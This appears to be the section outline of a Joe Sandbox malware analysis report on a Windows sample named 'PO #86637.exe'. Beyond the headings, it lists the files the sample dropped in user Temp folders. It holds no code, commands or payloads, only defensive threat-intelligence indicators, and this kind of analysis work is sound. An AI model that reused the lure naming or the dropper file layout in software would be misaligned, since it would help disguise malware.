Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3360000[1].zip

C:\Users\user\AppData\Local\Temp\01194HH4

C:\Users\user\AppData\Local\Temp\4zh4wl.zip

C:\Users\user\AppData\Local\Temp\aut2617.tmp

C:\Users\user\AppData\Local\Temp\aut2657.tmp

C:\Users\user\AppData\Local\Temp\croc

C:\Users\user\AppData\Local\Temp\disimmure

C:\Users\user\AppData\Local\Temp\sqlite3.def

C:\Users\user\AppData\Local\Temp\sqlite3.dll

C:\Users\user\AppData\Local\Temp\udapmlz.zip

C:\Users\user\AppData\Local\Temp\wtypr.zip

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
PO #86637.exe